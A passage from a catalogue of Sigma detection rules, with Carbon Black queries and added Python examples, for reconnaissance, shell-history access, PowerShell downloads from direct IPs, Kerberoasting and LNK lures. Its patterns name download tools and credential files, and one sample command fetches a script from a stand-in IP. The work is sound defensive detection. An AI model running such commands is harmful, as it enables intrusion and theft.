            - 'eternal-blue'
            - 'MS17-'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Suspicious Git Clone - Linux
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
carbon_black query
(Image:\/git CommandLine:\ clone\ *) (CommandLine:exploit* OR CommandLine:Vulns* OR CommandLine:vulnerability* OR CommandLine:RCE* OR CommandLine:RemoteCodeExecution* OR CommandLine:Invoke\-* OR CommandLine:CVE\-* OR CommandLine:poc\-* OR CommandLine:ProofOfConcept* OR CommandLine:proxyshell* OR CommandLine:log4shell* OR CommandLine:eternalblue* OR CommandLine:eternal\-blue* OR CommandLine:MS17\-*)
Sigma YAML
title: Suspicious Git Clone - Linux
id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-05
tags:
    - attack.reconnaissance
    - attack.t1593.003
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/git'
        CommandLine|contains: ' clone '
    selection_keyword:
        CommandLine|contains:
            # Add more suspicious keywords
            - 'exploit'
            - 'Vulns'
            - 'vulnerability'
            - 'RCE'
            - 'RemoteCodeExecution'
            - 'Invoke-'
            - 'CVE-'
            - 'poc-'
            - 'ProofOfConcept'
            # Add more vuln names
            - 'proxyshell'
            - 'log4shell'
            - 'eternalblue'
            - 'eternal-blue'
            - 'MS17-'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
status test author Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
carbon_black query
((Image:\\net.exe OR Image:\\net1.exe) OR (OriginalFileName:net.exe OR OriginalFileName:net1.exe)) ((((CommandLine:\ group\ * OR CommandLine:\ localgroup\ *) (CommandLine:domain\ admins* OR CommandLine:\ administrator* OR CommandLine:\ administrateur* OR CommandLine:enterprise\ admins* OR CommandLine:Exchange\ Trusted\ Subsystem* OR CommandLine:Remote\ Desktop\ Users* OR CommandLine:Utilisateurs\ du\ Bureau\ à\ distance* OR CommandLine:Usuarios\ de\ escritorio\ remoto* OR CommandLine:\ \/do*)) (-CommandLine:\ \/add*)) OR (CommandLine:\ accounts\ * CommandLine:\ \/do*))
Sigma YAML
title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
status: test
description: |
    Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
    Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
references:
    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
date: 2019-01-16
modified: 2023-03-02
tags:
    - attack.discovery
    - attack.t1087.001
    - attack.t1087.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\net.exe'
              - '\net1.exe'
        - OriginalFileName:
              - 'net.exe'
              - 'net1.exe'
    # Covers group and localgroup flags
    selection_group_root:
        CommandLine|contains:
            - ' group '
            - ' localgroup '
    selection_group_flags:
        CommandLine|contains:
            # Add more groups for other languages
            - 'domain admins'
            - ' administrator' # Typo without an 'S' so we catch both
            - ' administrateur' # Typo without an 'S' so we catch both
            - 'enterprise admins'
            - 'Exchange Trusted Subsystem'
            - 'Remote Desktop Users'
            - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users"
            - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users"
            - ' /do' # short for domain
    filter_group_add:
        # This filter is added to avoid the potential case where the point is not recon but addition
        CommandLine|contains: ' /add'
    # Covers 'accounts' flag
    selection_accounts_root:
        CommandLine|contains: ' accounts '
    selection_accounts_flags:
        CommandLine|contains: ' /do' # short for domain
    condition: selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)
falsepositives:
    - Inventory tool runs
    - Administrative activity
level: medium
medium Moderate High FP
Suspicious History File Operations
Detects commandline operations on shell history files
status test author Mikhail Larin, oscd.community ATT&CK sub-technique id 508a9374-ad52-4789-b568-fc358def2c65
carbon_black query
CommandLine:.bash_history* OR CommandLine:.zsh_history* OR CommandLine:.zhistory* OR CommandLine:.history* OR CommandLine:.sh_history* OR CommandLine:fish_history*
Sigma YAML
title: Suspicious History File Operations
id: 508a9374-ad52-4789-b568-fc358def2c65
status: test
description: Detects commandline operations on shell history files
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1552.003
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '.bash_history'
            - '.zsh_history'
            - '.zhistory'
            - '.history'
            - '.sh_history'
            - 'fish_history'
    condition: selection
falsepositives:
    - Legitimate administrative activity
    - Legitimate software, cleaning hist file
level: medium
medium Moderate Low FP
Suspicious History File Operations - Linux
Detects commandline operations on shell history files
status test author Mikhail Larin, oscd.community ATT&CK sub-technique id eae8ce9f-bde9-47a6-8e79-f20d18419910
carbon_black query
type:EXECVE (".bash_history" OR ".zsh_history" OR ".zhistory" OR ".history" OR ".sh_history" OR "fish_history")
view Sigma YAML
title: Suspicious History File Operations - Linux
id: eae8ce9f-bde9-47a6-8e79-f20d18419910
status: test
description: 'Detects commandline operations on shell history files'
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2022-11-28
tags:
    - attack.credential-access
    - attack.t1552.003
logsource:
    product: linux
    service: auditd
detection:
    execve:
        type: EXECVE
    history:
        - '.bash_history'
        - '.zsh_history'
        - '.zhistory'
        - '.history'
        - '.sh_history'
        - 'fish_history'
    condition: execve and history
falsepositives:
    - Legitimate administrative activity
    - Legitimate software, cleaning hist file
level: medium
medium Moderate High FP
Suspicious Hyper-V Cmdlets
Adversaries may carry out malicious operations using a virtual instance to avoid detection
status test author frack113 ATT&CK sub-technique id 42d36aa1-3240-4db0-8257-e0118dcdd9cd
carbon_black query
ScriptBlockText:New\-VM* OR ScriptBlockText:Set\-VMFirmware* OR ScriptBlockText:Start\-VM*
view Sigma YAML
title: Suspicious Hyper-V Cmdlets
id: 42d36aa1-3240-4db0-8257-e0118dcdd9cd
status: test
description: Adversaries may carry out malicious operations using a virtual instance to avoid detection
references:
    - https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine
author: frack113
date: 2022-04-09
tags:
    - attack.stealth
    - attack.t1564.006
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - New-VM
            - Set-VMFirmware
            - Start-VM
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium
medium Moderate High FP
Suspicious IIS URL GlobalRules Rewrite Via AppCmd
Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 7c8af9b2-dcae-41a2-a9db-b28c288b5f08
carbon_black query
(Image:\\appcmd.exe OR OriginalFileName:appcmd.exe) (CommandLine:set* CommandLine:config* CommandLine:section\:system.webServer\/rewrite\/globalRules* CommandLine:commit\:*)
view Sigma YAML
title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08
status: test
description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
references:
    - https://twitter.com/malmoeb/status/1616702107242971144
    - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\appcmd.exe'
        - OriginalFileName: 'appcmd.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'set'
            - 'config'
            - 'section:system.webServer/rewrite/globalRules'
            - 'commit:'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of appcmd to add new URL rewrite rules
level: medium
medium Moderate High FP
Suspicious IO.FileStream
Detects PowerShell that opens a handle on a drive volume via the \\.\ DOS device path specifier and reads the first bytes of the volume directly, below the file system.
status test author frack113 ATT&CK sub-technique id 70ad982f-67c8-40e0-a955-b920c2fa05cb
carbon_black query
ScriptBlockText:New\-Object* ScriptBlockText:IO.FileStream* ScriptBlockText:\\\\.\\*
view Sigma YAML
title: Suspicious IO.FileStream
id: 70ad982f-67c8-40e0-a955-b920c2fa05cb
status: test
description: Detects PowerShell that opens a handle on a drive volume via the \\.\ DOS device path specifier and reads the first bytes of the volume directly, below the file system.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md
author: frack113
date: 2022-01-09
modified: 2022-03-05
tags:
    - attack.stealth
    - attack.t1070.003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - New-Object
            - IO.FileStream
            - '\\\\.\\'
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium
medium Moderate High FP
Suspicious Installer Package Child Process
Detects the execution of suspicious child processes from a macOS installer package parent process. This covers shell and scripting interpreters (sh, bash, python, osascript, JXA via javascript and others) as well as the download tools curl and wget.
status test author Sohan G (D4rkCiph3r) ATT&CK sub-technique id e0cfaecd-602d-41af-988d-f6ccebb2af26
carbon_black query
(ParentImage:\/package_script_service OR ParentImage:\/installer) (Image:\/sh OR Image:\/bash OR Image:\/dash OR Image:\/python OR Image:\/ruby OR Image:\/perl OR Image:\/php OR Image:\/javascript OR Image:\/osascript OR Image:\/tclsh OR Image:\/curl OR Image:\/wget) (CommandLine:preinstall* OR CommandLine:postinstall*)
view Sigma YAML
title: Suspicious Installer Package Child Process
id: e0cfaecd-602d-41af-988d-f6ccebb2af26
status: test
description: Detects the execution of suspicious child processes from a macOS installer package parent process. This covers shell and scripting interpreters (sh, bash, python, osascript, JXA via javascript and others) as well as the download tools curl and wget.
references:
    - https://redcanary.com/blog/clipping-silver-sparrows-wings/
    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
    - attack.t1059
    - attack.t1059.007
    - attack.t1071
    - attack.t1071.001
    - attack.execution
    - attack.command-and-control
logsource:
    category: process_creation
    product: macos
detection:
    selection_installer:
        ParentImage|endswith:
            - '/package_script_service'
            - '/installer'
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/dash'
            - '/python'
            - '/ruby'
            - '/perl'
            - '/php'
            - '/javascript'
            - '/osascript'
            - '/tclsh'
            - '/curl'
            - '/wget'
        CommandLine|contains:
            - 'preinstall'
            - 'postinstall'
    condition: selection_installer
falsepositives:
    - Legitimate software uses the scripts (preinstall, postinstall)
level: medium
medium Moderate High FP
Suspicious Invoke-Item From Mount-DiskImage
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
status test author frack113 ATT&CK sub-technique id 902cedee-0398-4e3a-8183-6f3a89773a96
carbon_black query
ScriptBlockText:Mount\-DiskImage\ * ScriptBlockText:\-ImagePath\ * ScriptBlockText:Get\-Volume* ScriptBlockText:.DriveLetter* ScriptBlockText:invoke\-item\ * ScriptBlockText:\)\:\\*
view Sigma YAML
title: Suspicious Invoke-Item From Mount-DiskImage
id: 902cedee-0398-4e3a-8183-6f3a89773a96
status: test
description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso
    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
author: frack113
date: 2022-02-01
tags:
    - attack.defense-impairment
    - attack.t1553.005
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Mount-DiskImage '
            - '-ImagePath '
            - Get-Volume
            - '.DriveLetter'
            - 'invoke-item '
            - '):\'
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium
medium Moderate Medium FP
Suspicious Invoke-WebRequest Execution With DirectIP
Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 1edff897-9146-48d2-9066-52e8d8f80a2f
carbon_black query
((Image:\\powershell_ise.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:powershell_ise.EXE OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:curl\ * OR CommandLine:Invoke\-RestMethod* OR CommandLine:Invoke\-WebRequest* OR CommandLine:\ irm\ * OR CommandLine:iwr\ * OR CommandLine:wget\ *) (CommandLine:\:\/\/1* OR CommandLine:\:\/\/2* OR CommandLine:\:\/\/3* OR CommandLine:\:\/\/4* OR CommandLine:\:\/\/5* OR CommandLine:\:\/\/6* OR CommandLine:\:\/\/7* OR CommandLine:\:\/\/8* OR CommandLine:\:\/\/9*)
view Sigma YAML
title: Suspicious Invoke-WebRequest Execution With DirectIP
id: 1edff897-9146-48d2-9066-52e8d8f80a2f
status: test
description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
references:
    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'powershell_ise.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_commands:
        CommandLine|contains:
            # These are all aliases of Invoke-WebRequest
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
            - 'iwr '
            - 'wget '
    selection_ip:
        # In case of FP with local IPs add additional filters
        CommandLine|contains:
            - '://1'
            - '://2'
            - '://3'
            - '://4'
            - '://5'
            - '://6'
            - '://7'
            - '://8'
            - '://9'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
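The rule above fires on any URL whose host begins with a digit 1-9, which is cheap but also matches hostnames such as 1password.com and every internal address. The following is an added example, not code from the Sigma project or from this page: it implements the rule as written next to a tightened variant that takes up the rule's own comment ("In case of FP with local IPs add additional filters"). The tightened variant, its dotted-quad regex and its list of local ranges are assumptions of this example; the command lines are constructed.

```python
# Added example: "Suspicious Invoke-WebRequest Execution With DirectIP" as
# written, beside a tightened variant (an assumption, not part of the rule).
import ipaddress
import re

POWERSHELL_IMAGES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe")
# Sigma matching is case-insensitive, so tokens are lower-case and tested
# against a lower-cased command line. The spaces around ' irm ' are deliberate.
WEB_CMDLETS = ("curl ", "invoke-restmethod", "invoke-webrequest", " irm ", "iwr ", "wget ")

# Rule as written: "://" followed by a digit 1-9, whatever comes after it.
DIGIT_AFTER_SCHEME = tuple(f"://{d}" for d in "123456789")

# Tightened: a complete dotted quad right after "://", delimited by the end of
# the host part (port, path, whitespace, quote or end of string).
IP_URL = re.compile(r"://(\d{1,3}(?:\.\d{1,3}){3})(?=[:/\s\"']|$)")

# Explicit list rather than ipaddress.is_private, which in Python also flags
# documentation ranges such as 203.0.113.0/24 used in the samples below.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def _powershell_web_request(image: str, cmdline: str) -> bool:
    """selection_img and selection_commands of the rule."""
    img, cl = image.lower(), cmdline.lower()
    return img.endswith(POWERSHELL_IMAGES) and any(tok in cl for tok in WEB_CMDLETS)


def rule_as_written(image: str, cmdline: str) -> bool:
    """All three selections of the rule, exactly as published."""
    return _powershell_web_request(image, cmdline) and any(
        marker in cmdline.lower() for marker in DIGIT_AFTER_SCHEME
    )


def rule_tightened(image: str, cmdline: str, ignore_local: bool = True) -> bool:
    """Same image and cmdlet checks, but require a real IPv4 literal and
    (optionally) skip RFC1918, loopback and link-local targets."""
    if not _powershell_web_request(image, cmdline):
        return False
    for match in IP_URL.finditer(cmdline):
        try:
            ip = ipaddress.ip_address(match.group(1))
        except ValueError:  # e.g. 999.1.1.1 looks like a quad but is not an address
            continue
        if ignore_local and any(ip in net for net in LOCAL_NETS):
            continue
        return True
    return False


def run_both(image: str, cmdline: str) -> tuple[bool, bool]:
    return rule_as_written(image, cmdline), rule_tightened(image, cmdline)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PWSH = r"C:\Program Files\PowerShell\7\pwsh.exe"
# Constructed command lines (made up for this example).
SAMPLES = [
    (PS, 'powershell.exe -nop -w hidden -c "iwr http://203.0.113.10:8080/a.ps1 -OutFile a.ps1"'),
    (PS, "powershell.exe Invoke-WebRequest https://1password.com/downloads"),  # host starts with a digit
    (PWSH, "pwsh.exe -Command Invoke-RestMethod http://10.0.0.5/config.json"),  # internal address
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c curl http://198.51.100.7/x"),  # not PowerShell
    (PS, "powershell.exe Invoke-WebRequest https://updates.example.com/v2/"),
]

if __name__ == "__main__":
    for image, cmdline in SAMPLES:
        written, tight = run_both(image, cmdline)
        print(f"as-written={written!s:5} tightened={tight!s:5}  {cmdline}")
```

Only the first sample is a true hit for both variants; the 1password.com and 10.0.0.5 lines show the two false-positive classes the as-written rule produces, and the tightened check drops both while still firing on the hidden-window download from a public address.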
medium Strong Low FP
Suspicious Kerberos RC4 Ticket Encryption
Detects service ticket requests using RC4 encryption type
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 496a0e47-0a33-4dca-b009-9e6ca3591f39
carbon_black query
(EventID:4769 TicketOptions:0x40810000 TicketEncryptionType:0x17) (-ServiceName:$)
view Sigma YAML
title: Suspicious Kerberos RC4 Ticket Encryption
id: 496a0e47-0a33-4dca-b009-9e6ca3591f39
status: test
description: Detects service ticket requests using RC4 encryption type
references:
    - https://adsecurity.org/?p=3458
    - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
author: Florian Roth (Nextron Systems)
date: 2017-02-06
modified: 2022-06-19
tags:
    - attack.credential-access
    - attack.t1558.003
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketOptions: '0x40810000'
        TicketEncryptionType: '0x17'
    reduction:
        ServiceName|endswith: '$'
    condition: selection and not reduction
falsepositives:
    - Service accounts used on legacy systems (e.g. NetApp)
    - Windows Domains with DFL 2003 and legacy systems
level: medium
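The rule keys on three 4769 fields and then drops computer accounts, because a service ticket for a machine account has no Kerberoasting value. The following is an added example, not code from the Sigma project or from this page: it evaluates the rule over constructed Security 4769 records and adds a per-requester roll-up that separates the classic Kerberoasting shape (one principal requesting RC4 tickets for many SPNs) from the rule's documented false positive (a single legacy service account). The roll-up and its threshold are assumptions of this example, not part of the rule.

```python
# Added example: "Suspicious Kerberos RC4 Ticket Encryption" over constructed
# 4769 events, plus an assumed per-requester roll-up (not in the rule).
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event4769:
    """The 4769 (Kerberos service ticket request) fields the rule reads."""
    target_user_name: str        # account that requested the service ticket
    service_name: str            # SPN owner; computer accounts end with '$'
    ticket_options: str          # e.g. 0x40810000
    ticket_encryption_type: str  # 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96


def rule_matches(ev: Event4769) -> bool:
    """condition: selection and not reduction. Sigma string matching is
    case-insensitive, so the hex values are compared lower-cased."""
    selection = (
        ev.ticket_options.lower() == "0x40810000"
        and ev.ticket_encryption_type.lower() == "0x17"
    )
    reduction = ev.service_name.endswith("$")  # computer account
    return selection and not reduction


# Constructed sample events (made up for this example).
SAMPLE_EVENTS = [
    Event4769("alice", "MSSQLSvc/db01.corp.example:1433", "0x40810000", "0x17"),
    Event4769("alice", "HTTP/web01.corp.example", "0x40810000", "0x17"),
    Event4769("alice", "CIFS/fs01.corp.example", "0x40810000", "0x17"),
    Event4769("bob", "WS01$", "0x40810000", "0x17"),                        # machine account: reduced
    Event4769("carol", "MSSQLSvc/db02.corp.example", "0x40810000", "0x12"),  # AES256: not RC4
    Event4769("dave", "krbtgt", "0x40810010", "0x17"),                      # other TicketOptions
    Event4769("eve", "svc_backup", "0x40810000", "0x17"),                   # one legacy service: still fires
]


def alerts(events):
    """Every event the Sigma rule would raise."""
    return [ev for ev in events if rule_matches(ev)]


def kerberoast_candidates(events, min_spns: int = 3) -> set[str]:
    """Assumed extension: requesters that pulled RC4 tickets for at least
    min_spns distinct SPNs. The single-SPN legacy case (eve) stays below the
    threshold, which is where the rule's documented false positives live."""
    spns_per_user = defaultdict(set)
    for ev in alerts(events):
        spns_per_user[ev.target_user_name.lower()].add(ev.service_name.lower())
    return {user for user, spns in spns_per_user.items() if len(spns) >= min_spns}


if __name__ == "__main__":
    for ev in alerts(SAMPLE_EVENTS):
        print(f"ALERT {ev.target_user_name} -> {ev.service_name}")
    print("Kerberoast candidates:", kerberoast_candidates(SAMPLE_EVENTS))
```

Four of the seven constructed events raise the rule; only alice crosses the roll-up threshold. In production the roll-up would be bounded by a time window as well, which a SIEM aggregation expresses more naturally than this offline pass.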
medium Strong Medium FP
Suspicious Keyboard Layout Load
Detects the installation of a suspicious keyboard layout through the Preload or Substitutes registry keys, e.g. a Persian (Iran) or Vietnamese layout loaded in a user session on systems maintained by US staff only
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 34aa0252-6039-40ff-951f-939fd6ce47d8
carbon_black query
(TargetObject:\\Keyboard\ Layout\\Preload\\* OR TargetObject:\\Keyboard\ Layout\\Substitutes\\*) (Details:00000429* OR Details:00050429* OR Details:0000042a*)
view Sigma YAML
title: Suspicious Keyboard Layout Load
id: 34aa0252-6039-40ff-951f-939fd6ce47d8
status: test
description: Detects the installation of a suspicious keyboard layout through the Preload or Substitutes registry keys, e.g. a Persian (Iran) or Vietnamese layout loaded in a user session on systems maintained by US staff only
references:
    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
    - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
author: Florian Roth (Nextron Systems)
date: 2019-10-12
modified: 2023-08-17
tags:
    - attack.resource-development
    - attack.t1588.002
logsource:
    category: registry_set
    product: windows
    definition: 'Requirements: Sysmon config that monitors the \Keyboard Layout\Preload subkey of the HKCU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
detection:
    selection_registry:
        TargetObject|contains:
            - '\Keyboard Layout\Preload\'
            - '\Keyboard Layout\Substitutes\'
        Details|contains:
            - 00000429  # Persian (Iran)
            - 00050429  # Persian (Iran)
            - 0000042a  # Vietnamese
    condition: selection_registry
falsepositives:
    - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
level: medium
medium Strong Medium FP
Suspicious LNK Double Extension File Created
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
status test author Nasreddine Bencherchali (Nextron Systems), frack113 ATT&CK sub-technique id 3215aa19-f060-4332-86d5-5602511f3ca8
carbon_black query
(TargetFilename:.lnk (TargetFilename:.doc.* OR TargetFilename:.docx.* OR TargetFilename:.jpg.* OR TargetFilename:.pdf.* OR TargetFilename:.ppt.* OR TargetFilename:.pptx.* OR TargetFilename:.xls.* OR TargetFilename:.xlsx.*)) (-TargetFilename:\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*) (-(((Image:\\excel.exe OR Image:\\powerpnt.exe OR Image:\\winword.exe) TargetFilename:\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*) OR (Image:\\excel.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\Excel*) OR (Image:\\powerpnt.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\PowerPoint*) OR (Image:\\winword.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\Word*)))
view Sigma YAML
title: Suspicious LNK Double Extension File Created
id: 3215aa19-f060-4332-86d5-5602511f3ca8
related:
    - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
      type: derived
status: test
description: |
    Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
references:
    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles
    - https://twitter.com/malwrhunterteam/status/1235135745611960321
    - https://twitter.com/luc4m/status/1073181154126254080
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2022-11-07
modified: 2023-10-18
tags:
    - attack.stealth
    - attack.t1036.007
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '.lnk'
        TargetFilename|contains:
            - '.doc.'
            - '.docx.'
            - '.jpg.'
            - '.pdf.'
            - '.ppt.'
            - '.pptx.'
            - '.xls.'
            - '.xlsx.'
    filter_main_recent:
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Windows\Recent\'
    filter_optional_office_recent:
        Image|endswith:
            # Note: Some additional office application might need to be added
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Office\Recent\'
    filter_optional_office_excel:
        Image|endswith: '\excel.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Excel'
    filter_optional_office_powerpoint:
        Image|endswith: '\powerpnt.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\PowerPoint'
    filter_optional_office_word:
        Image|endswith: '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Word'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Some tuning is required for other general purpose directories of third party apps
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml
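The filters in this rule are not all equal: the Recent-folder filter applies regardless of which process wrote the shortcut, while the Office MRU filters only apply when an Office binary itself created the file, so a dropper writing a decoy .docx.lnk into the Office Recent folder still fires. The following is an added example, not code from the Sigma project or from this page, that evaluates the rule over constructed file-creation events to make that asymmetry visible. Paths and process names are constructed.

```python
# Added example: "Suspicious LNK Double Extension File Created", including
# its image-scoped filters, over constructed file_event records.
from dataclasses import dataclass

DOC_EXTS = (".doc.", ".docx.", ".jpg.", ".pdf.", ".ppt.", ".pptx.", ".xls.", ".xlsx.")
OFFICE_IMAGES = ("\\excel.exe", "\\powerpnt.exe", "\\winword.exe")


@dataclass(frozen=True)
class FileEvent:
    image: str            # process that created the file
    target_filename: str  # full path of the created file


def rule_matches(ev: FileEvent) -> bool:
    """condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*"""
    img, path = ev.image.lower(), ev.target_filename.lower()
    selection = path.endswith(".lnk") and any(ext in path for ext in DOC_EXTS)
    if not selection:
        return False
    # filter_main_recent: shell shortcuts in the Recent folder, any creating process.
    if "\\appdata\\roaming\\microsoft\\windows\\recent\\" in path:
        return False
    # filter_optional_*: Office's own MRU shortcuts, only when Office wrote them.
    office_mru = (
        (img.endswith(OFFICE_IMAGES) and "\\appdata\\roaming\\microsoft\\office\\recent\\" in path)
        or (img.endswith("\\excel.exe") and "\\appdata\\roaming\\microsoft\\excel" in path)
        or (img.endswith("\\powerpnt.exe") and "\\appdata\\roaming\\microsoft\\powerpoint" in path)
        or (img.endswith("\\winword.exe") and "\\appdata\\roaming\\microsoft\\word" in path)
    )
    return not office_mru


def evaluate(events) -> list[bool]:
    return [rule_matches(ev) for ev in events]


EXPLORER = r"C:\Windows\explorer.exe"
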